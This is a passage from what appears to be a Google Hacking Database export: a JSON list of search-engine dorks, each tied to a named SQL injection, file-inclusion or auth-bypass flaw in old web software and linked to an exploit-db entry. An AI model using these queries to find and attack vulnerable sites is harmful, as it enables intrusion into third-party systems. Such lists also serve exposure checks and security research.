"2010-11-15", "request": "allinurl: page_id album \"photo\"", "id": 1829}, {"short description": "\"Powered by beamospetition 1.0.12\"", "long description": "Joomla Component beamospetition 1.0.12 SQL Injection / XSS - CVE: 2009-0378: http://www.exploit-db.com/exploits/7847", "submited": "2010-11-15", "request": "\"Powered by beamospetition 1.0.12\"", "id": 1830}, {"short description": "\"Powered by 68kb\"", "long description": "68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection: http://www.exploit-db.com/exploits/11925", "submited": "2010-11-15", "request": "\"Powered by 68kb\"", "id": 1831}, {"short description": "intext:\"powered and designed by Dow Group\"", "long description": "Dow Group (new.php) SQL Injection: http://www.exploit-db.com/exploits/9491", "submited": "2010-11-15", "request": "intext:\"powered and designed by Dow Group\"", "id": 1832}, {"short description": "\"powered by devalcms v1.4.a\"", "long description": "devalcms 1.4a XSS / Remote Code Execution - CVE: 2008-6982: http://www.exploit-db.com/exploits/6369", "submited": "2010-11-15", "request": "\"powered by devalcms v1.4.a\"", "id": 1833}, {"short description": "inurl:com_webring", "long description": "Joomla Webring Component 1.0 Remote Include Vulnerability - CVE: 2006-4129: http://www.exploit-db.com/exploits/2177", "submited": "2010-11-15", "request": "inurl:com_webring", "id": 1834}, {"short description": "inurl:hikaye.asp?id=", "long description": "Caner Hikaye Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14419", "submited": "2010-11-15", "request": "inurl:hikaye.asp?id=", "id": 1835}, {"short description": "intext:Design by: runt communications", "long description": "runt-communications Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12707", "submited": "2010-11-15", "request": "intext:Design by: runt communications", "id": 1837}, {"short description": "Copyright Agares Media phpautovideo", "long description": "phpAutoVideo CSRF Vulnerability - OSVDB-ID: 62450: http://www.exploit-db.com/exploits/11502", "submited": "2010-11-15", "request": "Copyright Agares Media phpautovideo", "id": 1838}, {"short description": "\"Powered by DVHome.cn\"", "long description": "PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability - CVE: 2007-2544: http://www.exploit-db.com/exploits/3854", "submited": "2010-11-15", "request": "\"Powered by DVHome.cn\"", "id": 1840}, {"short description": "intext:\"powered by Milonic\" inurl:viewnews.php?id=", "long description": "Milonic News (viewnews) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11031", "submited": "2010-11-15", "request": "intext:\"powered by Milonic\" inurl:viewnews.php?id=", "id": 1842}, {"short description": "\"powered by ExtCalendar v2\"", "long description": "com_extcalendar Mambo Component 2.0 Include Vulnerability: http://www.exploit-db.com/exploits/2022", "submited": "2010-11-15", "request": "\"powered by ExtCalendar v2\"", "id": 1843}, {"short description": "\"Search | Invite | Mail | Blog | Forum\"", "long description": "Myspace Clone Script (index.php) Remote File Inclusion Vulnerability - CVE: 2007-6057: http://www.exploit-db.com/exploits/4628", "submited": "2010-11-15", "request": "\"Search | Invite | Mail | Blog | Forum\"", "id": 1845}, {"short description": "\"AcmlmBoard v1.A2\"", "long description": "AcmlmBoard 1.A2 (pow) Remote SQL Injection Vulnerability - CVE: 2008-5198: http://www.exploit-db.com/exploits/5969", "submited": "2010-11-15", "request": "\"AcmlmBoard v1.A2\"", "id": 1846}, {"short description": "inurl:index.php?option=com_mambads", "long description": "Mambo Component com_mambads SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11719", "submited": "2010-11-15", "request": "inurl:index.php?option=com_mambads", "id": 1847}, {"short description": "inurl:\"modules.php?name=My_eGallery\"", "long description": "PHP-Nuke My_eGallery 2.7.9 Remote SQL Injection Vulnerability - CVE: 2008-7038: http://www.exploit-db.com/exploits/5203", "submited": "2010-11-15", "request": "inurl:\"modules.php?name=My_eGallery\"", "id": 1848}, {"short description": "\"Marketplace Version 1.1.1\"", "long description": "Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability - CVE: 2008-0689: http://www.exploit-db.com/exploits/5055", "submited": "2010-11-15", "request": "\"Marketplace Version 1.1.1\"", "id": 1850}, {"short description": "\"Powered by Ajax Portal 3.0\"", "long description": "MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5653: http://www.exploit-db.com/exploits/7044", "submited": "2010-11-15", "request": "\"Powered by Ajax Portal 3.0\"", "id": 1852}, {"short description": "\"Powered By IP.Board 3.0.0 Beta 5\"", "long description": "Invision Power Board 3.0.0b5 Active XSS &amp; Path Disclosure Vulns: http://www.exploit-db.com/exploits/8538", "submited": "2010-11-15", "request": "\"Powered By IP.Board 3.0.0 Beta 5\"", "id": 1853}, {"short description": "\"MunzurSoft Wep Portal W3\"", "long description": "MunzurSoft Wep Portal W3 (kat) SQL Injection Vulnerability - CVE: 2008-4573: http://www.exploit-db.com/exploits/6725", "submited": "2010-11-15", "request": "\"MunzurSoft Wep Portal W3\"", "id": 1854}, {"short description": "Powered by Blox CMS from TownNews.com", "long description": "Blox CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12729", "submited": "2010-11-15", "request": "Powered by Blox CMS from TownNews.com", "id": 1855}, {"short description": "allinurl :\"wp-content/plugins/st_newsletter\"", "long description": "Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability - CVE: 2008-0683: http://www.exploit-db.com/exploits/5053", "submited": "2010-11-15", "request": "allinurl :\"wp-content/plugins/st_newsletter\"", "id": 1856}, {"short description": "\"2008 DevWorx - devworx.somee.com\"", "long description": "TermiSBloG V 1.0 SQL Injection(s) Vulnerability: http://www.exploit-db.com/exploits/11081", "submited": "2010-11-15", "request": "\" 2008 DevWorx - devworx.somee.com\"", "id": 1857}, {"short description": "inurl:\"links_showcat.php?\"", "long description": "Dlili Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11318", "submited": "2010-11-15", "request": "inurl:\"links_showcat.php?\"", "id": 1858}, {"short description": "Powered by SH-News 3.0", "long description": "SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability - CVE: 2007-6391: http://www.exploit-db.com/exploits/4709", "submited": "2010-11-15", "request": "Powered by SH-News 3.0", "id": 1859}, {"short description": "\"CaLogic Calendars V1.2.2\"", "long description": "CaLogic Calendars 1.2.2 (langsel) Remote SQL Injection Vulnerability - CVE: 2008-2444: http://www.exploit-db.com/exploits/5607", "submited": "2010-11-15", "request": "\"CaLogic Calendars V1.2.2\"", "id": 1860}, {"short description": "inurl:\"com_pollxt\"", "long description": "pollxt Mambo Component 1.22.07 Remote Include Vulnerability - CVE: 2006-5045: http://www.exploit-db.com/exploits/2029", "submited": "2010-11-15", "request": "inurl:\"com_pollxt\"", "id": 1861}, {"short description": "Powered by PHP Links from DeltaScripts", "long description": "PHP Links 1.3 (vote.php id) Remote SQL Injection Vulnerability - CVE: 2008-0565: http://www.exploit-db.com/exploits/5021", "submited": "2010-11-15", "request": "Powered by PHP Links from DeltaScripts", "id": 1862}, {"short description": "inurl:index.php?option=com_calendario", "long description": "Joomla Component com_calendario Blind SQL injection Vulnerability: http://www.exploit-db.com/exploits/10760", "submited": "2010-11-15", "request": "inurl:index.php?option=com_calendario", "id": 1864}, {"short description": "Powered by PNphpBB2 / Powered por PNphpBB2", "long description": "PNphpBB2 1.2g (phpbb_root_path) Remote File Include Vulnerability - CVE: 2006-4968: http://www.exploit-db.com/exploits/2390", "submited": "2010-11-15", "request": "Powered by PNphpBB2 / Powered por PNphpBB2", "id": 1865}, {"short description": "\"Powered by Nukedit\"", "long description": "Nukedit 4.9.8 Remote Database Disclosure Vulnerability - CVE: 2008-5773: http://www.exploit-db.com/exploits/7491", "submited": "2010-11-15", "request": "\"Powered by Nukedit\"", "id": 1866}, {"short description": "Powered by \"vcart 3.3.2\"", "long description": "vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0287: http://www.exploit-db.com/exploits/4889", "submited": "2010-11-15", "request": "Powered by \"vcart 3.3.2\"", "id": 1867}, {"short description": "Powered by SkaLinks", "long description": "SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-0451: http://www.exploit-db.com/exploits/7932", "submited": "2010-11-15", "request": "Powered by SkaLinks", "id": 1868}, {"short description": "\"mirco blogging\"", "long description": "x10 mirco blogging V121 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12042", "submited": "2010-11-15", "request": "\"mirco blogging\"", "id": 1869}, {"short description": "\" par KDPics v1.18\"", "long description": "par KDPics v1.18 Remote Add Admin: http://www.exploit-db.com/exploits/11455", "submited": "2010-11-15", "request": "\" par KDPics v1.18\"", "id": 1871}, {"short description": "inurl:\"nabopoll/\"", "long description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability - CVE: 2005-2157: http://www.exploit-db.com/exploits/3315", "submited": "2010-11-15", "request": "inurl:\"nabopoll/\"", "id": 1873}, {"short description": "allinurl :\"modules/eblog\"", "long description": "eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5253", "submited": "2010-11-15", "request": "allinurl :\"modules/eblog\"", "id": 1874}, {"short description": "Powered By DataLife Engine", "long description": "DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability - CVE: 2009-3055: http://www.exploit-db.com/exploits/9572", "submited": "2010-11-15", "request": "Powered By DataLife Engine", "id": 1875}, {"short description": "\" Sabdrimer CMS\"", "long description": "Sabdrimer PRO 2.2.4 (pluginpath) Remote File Include Vulnerability - CVE: 2006-3520: http://www.exploit-db.com/exploits/1996", "submited": "2010-11-15", "request": "\" Sabdrimer CMS\"", "id": 1876}, {"short description": "AlstraSoft Web \"ESE\"", "long description": "AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln - CVE: 2008-5751: http://www.exploit-db.com/exploits/7596", "submited": "2010-11-15", "request": "AlstraSoft Web \"ESE\"", "id": 1877}, {"short description": "Powered by Maian Cart v1.1", "long description": "Maian Cart 1.1 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6047", "submited": "2010-11-15", "request": "Powered by Maian Cart v1.1", "id": 1881}, {"short description": "Thyme 1. 2006 eXtrovert Software LLC. All rights reserved", "long description": "Thyme 1.3 (export_to) Local File Inclusion Vulnerability - CVE: 2009-0535: http://www.exploit-db.com/exploits/8029", "submited": "2010-11-15", "request": "Thyme 1. 2006 eXtrovert Software LLC. All rights reserved", "id": 1883}, {"short description": "eXV2 MyAnnonces", "long description": "eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability - CVE: 2008-1406: http://www.exploit-db.com/exploits/5252", "submited": "2010-11-15", "request": "eXV2 MyAnnonces", "id": 1884}, {"short description": "\"BlogMe PHP created by Gamma Scripts\"", "long description": "BlogMe PHP (comments.php id) SQL Injection Vulnerability - CVE: 2008-2175: http://www.exploit-db.com/exploits/5533", "submited": "2010-11-15", "request": "\"BlogMe PHP created by Gamma Scripts\"", "id": 1886}, {"short description": "inurl:\"/go/_files/?file=\"", "long description": "SOTEeSKLEP 3.5RC9 (file) Remote File Disclosure Vulnerability - CVE: 2007-4369: http://www.exploit-db.com/exploits/4282", "submited": "2010-11-15", "request": "inurl:\"/go/_files/?file=\"", "id": 1887}, {"short description": "inurl:\"option=com_camelcitydb2\"", "long description": "Joomla CamelcityDB 2.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14530", "submited": "2010-11-15", "request": "inurl:\"option=com_camelcitydb2\"", "id": 1888}, {"short description": "Powered by PacerCMS", "long description": "PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/5098", "submited": "2010-11-15", "request": "Powered by PacerCMS", "id": 1889}, {"short description": "inurl:com_expshop", "long description": "Joomla Component EXP Shop (catid) SQL Injection Vulnerability - CVE: 2008-2892: http://www.exploit-db.com/exploits/5893", "submited": "2010-11-15", "request": "inurl:com_expshop", "id": 1890}, {"short description": "\"Sitedesign by: Dieleman www.dieleman.nl - Copyright 2010\"", "long description": "Rave Creations/UHM (artists.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12701", "submited": "2010-11-15", "request": "\"Sitedesign by: Dieleman www.dieleman.nl - Copyright 2010\"", "id": 1891}, {"short description": "intitle:\"ITech Bids\"", "long description": "ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection Vulnerability - CVE: 2008-0692: http://www.exploit-db.com/exploits/5056", "submited": "2010-11-15", "request": "intitle:\"ITech Bids\"", "id": 1892}, {"short description": "\"Script realise par BinGo PHP\"", "long description": "BinGo News 3.01 (bnrep) Remote File Include Vulnerability - CVE: 2006-4648: http://www.exploit-db.com/exploits/2312", "submited": "2010-11-15", "request": "\"Script realise par BinGo PHP\"", "id": 1893}, {"short description": "Powered by CS-Cart - Shopping Cart Software", "long description": "CS-Cart 1.3.3 (classes_dir) Remote File Include Vulnerability - CVE: 2006-2863: http://www.exploit-db.com/exploits/1872", "submited": "2010-11-15", "request": "Powered by CS-Cart - Shopping Cart Software", "id": 1894}, {"short description": "inurl:com_colophon", "long description": "Mambo Colophon Component 1.2 Remote Inclusion Vulnerability - CVE: 2006-3969: http://www.exploit-db.com/exploits/2085", "submited": "2010-11-15", "request": "inurl:com_colophon", "id": 1895}, {"short description": "\" Powered by JTL-Shop 2\"", "long description": "JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability - CVE: 2010-0691: http://www.exploit-db.com/exploits/11445", "submited": "2010-11-15", "request": "\" Powered by JTL-Shop 2\"", "id": 1896}, {"short description": "\"Powered by PHP Shop from DeltaScripts\"", "long description": "DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5648: http://www.exploit-db.com/exploits/7025", "submited": "2010-11-15", "request": "\"Powered by PHP Shop from DeltaScripts\"", "id": 1898}, {"short description": "\"Powered by sNews \" inurl:index.php?id=", "long description": "sNews (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14458", "submited": "2010-11-15", "request": "\"Powered by sNews \" inurl:index.php?id=", "id": 1901}, {"short description": "\"Torbstoff News 4\"", "long description": "Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability - CVE: 2006-4045: http://www.exploit-db.com/exploits/2121", "submited": "2010-11-15", "request": "\"Torbstoff News 4\"", "id": 1903}, {"short description": "intext:Powered by MX-System 2.7.3", "long description": "MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability - CVE: 2008-2477: http://www.exploit-db.com/exploits/5659", "submited": "2010-11-15", "request": "intext:Powered by MX-System 2.7.3", "id": 1904}, {"short description": "\"Powered By 4smart\"", "long description": "Magician Blog 1.0 (Auth Bypass) SQL injection Vulnerability: http://www.exploit-db.com/exploits/9283", "submited": "2010-11-15", "request": "\"Powered By 4smart\"", "id": 1905}, {"short description": "intext:\"Powered by Arcade Builder\"", "long description": "ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln - CVE: 2007-3521: http://www.exploit-db.com/exploits/4133", "submited": "2010-11-15", "request": "intext:\"Powered by Arcade Builder\"", "id": 1906}, {"short description": "\"intext:Warning: passthru()\" \"inurl:view=help\"", "long description": "PTC Site's RCE/XSS Vulnerability: http://www.exploit-db.com/exploits/12808", "submited": "2010-11-15", "request": "\"intext:Warning: passthru()\" \"inurl:view=help\"", "id": 1907}, {"short description": "inurl:\"index.php?id_menu=\"", "long description": "CMScontrol 7.x File Upload: http://www.exploit-db.com/exploits/11104", "submited": "2010-11-15", "request": "inurl:\"index.php?id_menu=\"", "id": 1908}, {"short description": "Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine", "long description": "Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include Vulnerability: http://www.exploit-db.com/exploits/2375", "submited": "2010-11-15", "request": "Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine", "id": 1909}, {"short description": "2005-2006 Powered by eSyndiCat Directory Software", "long description": "eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities - CVE: 2007-3811: http://www.exploit-db.com/exploits/4183", "submited": "2010-11-15", "request": "2005-2006 Powered by eSyndiCat Directory Software", "id": 1911}, {"short description": "\"powered by Nabernet\"", "long description": "Nabernet (articles.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11482", "submited": "2010-11-15", "request": "\"powered by Nabernet\"", "id": 1912}, {"short description": "\"Powered by VS PANEL 7.5.5\"", "long description": "http://www.exploit-db.com/exploits/9171 - CVE: 2009-3595: http://www.exploit-db.com/exploits/9171", "submited": "2010-11-15", "request": "\"Powered by VS PANEL 7.5.5\"", "id": 1913}, {"short description": "PHPGnalogie fonctionne sur un serveur PHP", "long description": "PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability - CVE: 2009-3541: http://www.exploit-db.com/exploits/9155", "submited": "2010-11-15", "request": "PHPGnalogie fonctionne sur un serveur PHP", "id": 1914}, {"short description": "\"powered by easytrade\"", "long description": "easyTrade 2.x (detail.php id) Remote SQL Injection Vulnerability - CVE: 2008-2790: http://www.exploit-db.com/exploits/5840", "submited": "2010-11-15", "request": "\"powered by easytrade\"", "id": 1915}, {"short description": "inurl:\"articles.php?topic=\"", "long description": "jPORTAL 2.3.1 articles.php Remote SQL Injection Vulnerability - CVE: 2007-5973: http://www.exploit-db.com/exploits/4614", "submited": "2010-11-15", "request": "inurl:\"articles.php?topic=\"", "id": 1916}, {"short description": "inurl:\"classifieds.php?op=detail_adverts\"", "long description": "PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability - CVE: 2008-5197: http://www.exploit-db.com/exploits/5961", "submited": "2010-11-15", "request": "inurl:\"classifieds.php?op=detail_adverts\"", "id": 1917}, {"short description": "\"Emefa Guestbook V 3.0\"", "long description": "Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability - CVE: 2008-5852: http://www.exploit-db.com/exploits/7534", "submited": "2010-11-15", "request": "\"Emefa Guestbook V 3.0\"", "id": 1919}, {"short description": "powered by webit! cms", "long description": "Webit Cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12744", "submited": "2010-11-15", "request": "powered by webit! cms", "id": 1920}, {"short description": "inurl:\"char.php?id=\" OR intitle:Minimanager for trinity server", "long description": "http://www.exploit-db.com/exploits/12554: http://www.exploit-db.com/exploits/12554", "submited": "2010-11-15", "request": "inurl:\"char.php?id=\" OR intitle:Minimanager for trinity server", "id": 1921}, {"short description": "\"wow roster version 1.*\"", "long description": "WoW Roster 1.70 (/lib/phpbb.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2109", "submited": "2010-11-15", "request": "\"wow roster version 1.*\"", "id": 1922}, {"short description": "inurl:com_DTRegister eventId", "long description": "Joomla Component DT Register Remote SQL injection Vulnerability - CVE: 2008-3265: http://www.exploit-db.com/exploits/6086", "submited": "2010-11-15", "request": "inurl:com_DTRegister eventId", "id": 1924}, {"short description": "\"wow roster version 1.5.*\"", "long description": "WoW Roster 1.5.1 (subdir) Remote File Include Vulnerability - CVE: 2006-3998: http://www.exploit-db.com/exploits/2099", "submited": "2010-11-15", "request": "\"wow roster version 1.5.*\"", "id": 1925}, {"short description": "Powered by free simple software", "long description": "Free Simple Software v1.0 Remote File Inclusion Vulnerability - CVE: 2010-3307: http://www.exploit-db.com/exploits/14672", "submited": "2010-11-15", "request": "Powered by free simple software", "id": 1926}, {"short description": "\"TR Newsportal\" brought by TRanx.", "long description": "TR Newsportal 0.36tr1 (poll.php) Remote File Inclusion Vulnerability - CVE: 2006-2557: http://www.exploit-db.com/exploits/1789", "submited": "2010-11-15", "request": "\"TR Newsportal\" brought by TRanx.", "id": 1927}, {"short description": "Powered by Minerva 237", "long description": "Minerva 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability - CVE: 2006-3028: http://www.exploit-db.com/exploits/1908", "submited": "2010-11-15", "request": "Powered by Minerva 237", "id": 1928}, {"short description": "\"Powered By W3infotech\"", "long description": "W3infotech ( Auth Bypass ) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10222", "submited": "2010-11-15", "request": "\"Powered By W3infotech\"", "id": 1930}, {"short description": "inurl:\"option=com_org\"", "long description": "Joomla Component com_org SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11725", "submited": "2010-11-15", "request": "inurl:\"option=com_org\"", "id": 1931}, {"short description": "\"Powered by GameSiteScript\"", "long description": "GameSiteScript 3.1 (profile id) Remote SQL Injection Vulnerability - CVE: 2007-3631: http://www.exploit-db.com/exploits/4159", "submited": "2010-11-15", "request": "\"Powered by GameSiteScript\"", "id": 1932}, {"short description": "Powered by: Con-Imedia", "long description": "IMEDIA (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12665", "submited": "2010-11-15", "request": "Powered by: Con-Imedia", "id": 1933}, {"short description": "(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1", "long description": "Bux.to Clone Script Insecure Cookie Handling Vulnerability - CVE: 2008-6162: http://www.exploit-db.com/exploits/6652", "submited": "2010-11-15", "request": "(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1", "id": 1934}, {"short description": "\"powered by twg\"", "long description": "TinyWebGallery 1.5 (image) Remote Include Vulnerabilities - CVE: 2006-4166: http://www.exploit-db.com/exploits/2158", "submited": "2010-11-15", "request": "\"powered by twg\"", "id": 1935}, {"short description": "allinurl:/phpress/", "long description": "phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4382", "submited": "2010-11-15", "request": "allinurl:/phpress/", "id": 1936}, {"short description": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "long description": "Sendcard 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability - CVE: 2007-2471: http://www.exploit-db.com/exploits/3827", "submited": "2010-11-15", "request": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "id": 1937}, {"short description": "intext: \"Powered by Marinet\"", "long description": "Marinet cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12575", "submited": "2010-11-15", "request": "intext: \"Powered by Marinet\"", "id": 1942}, {"short description": "UPublisher", "long description": "UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability - CVE: 2006-5888: http://www.exploit-db.com/exploits/2765", "submited": "2010-11-15", "request": "UPublisher", "id": 1943}, {"short description": "intitle:\"Answer Builder\"  Ask a question", "long description": "Expert Advisior (index.php id) Remote SQL Injection Vulnerbility - CVE: 2007-3882: http://www.exploit-db.com/exploits/4189", "submited": "2010-11-15", "request": "intitle:\"Answer Builder\"  Ask a question", "id": 1944}, {"short description": "inurl:\"tinybrowser.php?\"", "long description": "TinyBrowser Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12692", "submited": "2010-11-15", "request": "inurl:\"tinybrowser.php?\"", "id": 1945}, {"short description": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "long description": "ZeeWays Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11087", "submited": "2010-11-15", "request": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "id": 1946}, {"short description": "\"Powered by ECShop v2.5.0\"", "long description": "ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability - CVE: 2009-1622: http://www.exploit-db.com/exploits/8548", "submited": "2010-11-15", "request": "\"Powered by ECShop v2.5.0\"", "id": 1947}, {"short description": "\"powered by Photo-Graffix Flash Image Gallery\"", "long description": "Photo Graffix 3.4 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8372", "submited": "2010-11-15", "request": "\"powered by Photo-Graffix Flash Image Gallery\"", "id": 1948}, {"short description": "\"inc_webblogmanager.asp\"", "long description": "DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability - CVE: 2009-2238: http://www.exploit-db.com/exploits/8749", "submited": "2010-11-15", "request": "\"inc_webblogmanager.asp\"", "id": 1949}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine Category Addon (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6947", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 1950}, {"short description": "inurl:index.php?mod=jeuxflash", "long description": "KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability - CVE: 2008-1759: http://www.exploit-db.com/exploits/5352", "submited": "2010-11-15", "request": "inurl:index.php?mod=jeuxflash", "id": 1951}, {"short description": "allinurl :\"modules/gallery\"", "long description": "XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5241", "submited": "2010-11-15", "request": "allinurl :\"modules/gallery\"", "id": 1952}, {"short description": "intext:\"Design by MMA Creative\"", "long description": "MMA Creative Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12706", "submited": "2010-11-15", "request": "intext:\"Design by MMA Creative\"", "id": 1953}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-4178: http://www.exploit-db.com/exploits/6946", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 1954}, {"short description": "''com_noticias''", "long description": "Joomla Component com_noticias 1.0 SQL Injection Vulnerability - CVE: 2008-0670: http://www.exploit-db.com/exploits/5081", "submited": "2010-11-15", "request": "&#039;&#039;com_noticias&#039;&#039;", "id": 1955}, {"short description": "\"MobPartner Counter\" \"upload files\"", "long description": "MobPartner Counter - Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11019", "submited": "2010-11-15", "request": "\"MobPartner Counter\" \"upload files\"", "id": 1956}, {"short description": "allinurl: \"modules/glossaires\"", "long description": "XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5216", "submited": "2010-11-15", "request": "allinurl: \"modules/glossaires\"", "id": 1957}, {"short description": "inurl:com_netinvoice", "long description": "Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability - CVE: 2008-3498: http://www.exploit-db.com/exploits/5939", "submited": "2010-11-15", "request": "inurl:com_netinvoice", "id": 1958}, {"short description": ":  inurl:\"read.php?datespan=\"", "long description": "http://www.exploit-db.com/exploits/5703", "submited": "2010-11-15", "request": "", "id": 1959}, {"short description": "inurl:com_beamospetition", "long description": "Joomla Component beamospetition Remote SQL Injection Vulnerability - CVE: 2008-3132: http://www.exploit-db.com/exploits/5965", "submited": "2010-11-15", "request": "inurl:com_beamospetition", "id": 1960}, {"short description": "\"com_lmo\"", "long description": "Joomla LMO Component 1.0b2 Remote Include Vulnerability - CVE: 2006-3970: http://www.exploit-db.com/exploits/2092", "submited": "2010-11-15", "request": "\"com_lmo\"", "id": 1961}, {"short description": "\"Powered by Clicknet CMS\"", "long description": "Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability - CVE: 2009-2325: http://www.exploit-db.com/exploits/9037", "submited": "2010-11-15", "request": "\"Powered by Clicknet CMS\"", "id": 1962}, {"short description": "Igloo (interest group glue)", "long description": "Igloo 0.1.9 (Wiki.php) Remote File Include Vulnerability - CVE: 2006-2819: http://www.exploit-db.com/exploits/1863", "submited": "2010-11-15", "request": "Igloo (interest group glue)", "id": 1963}, {"short description": "inurl:\"com_acstartseite\"", "long description": "Joomla Component com_acstartseite Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11479", "submited": "2010-11-15", "request": "inurl:\"com_acstartseite\"", "id": 1964}, {"short description": "\"Powered by Populum\"", "long description": "Populum 2.3 SQL injection vulnerability: http://www.exploit-db.com/exploits/11126", "submited": "2010-11-15", "request": "\"Powered by Populum\"", "id": 1965}, {"short description": "\"Powered by PWP Version 1-5-1\" AND inurl:\"/wiki/run.php\"", "long description": "PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7740", "submited": "2010-11-15", "request": "\"Powered by PWP Version 1-5-1\" AND inurl:\"/wiki/run.php\"", "id": 1967}, {"short description": "intext:\"Design by BB Media.Org\"", "long description": "BBMedia Design's SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12711", "submited": "2010-11-15", "request": "intext:\"Design by BB Media.Org\"", "id": 1968}, {"short description": "inurl:\"com_acprojects\"", "long description": "Joomla Component com_acprojects Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11480", "submited": "2010-11-15", "request": "inurl:\"com_acprojects\"", "id": 1969}, {"short description": "inurl:\"com_acteammember\"", "long description": "Joomla Component com_acteammember SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11483", "submited": "2010-11-15", "request": "inurl:\"com_acteammember\"", "id": 1970}, {"short description": "Powered by Maian Weblog v4.0", "long description": "Maian Weblog 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3318: http://www.exploit-db.com/exploits/6064", "submited": "2010-11-15", "request": "Powered by Maian Weblog v4.0", "id": 1971}, {"short description": "Powered by: Maian Recipe v1.2", "long description": "Maian Recipe 1.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3322: http://www.exploit-db.com/exploits/6063", "submited": "2010-11-15", "request": "Powered by: Maian Recipe v1.2", "id": 1972}, {"short description": "Powered by: Maian Search v1.1", "long description": "Maian Search 1.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3317: http://www.exploit-db.com/exploits/6066", "submited": "2010-11-15", "request": "Powered by: Maian Search v1.1", "id": 1973}, {"short description": "Powered by: Maian Links v3.1", "long description": "Maian Links 3.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3319: http://www.exploit-db.com/exploits/6062", "submited": "2010-11-15", "request": "Powered by: Maian Links v3.1", "id": 1974}, {"short description": "Powered by: Maian Uploader v4.0", "long description": "Maian Uploader 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3321: http://www.exploit-db.com/exploits/6065", "submited": "2010-11-15", "request": "Powered by: Maian Uploader v4.0", "id": 1975}, {"short description": "\"Powered By Steamcast \"0.9.75 beta", "long description": "Steamcast 0.9.75b Remote Denial of Service: http://www.exploit-db.com/exploits/8429", "submited": "2010-11-15", "request": "\"Powered By 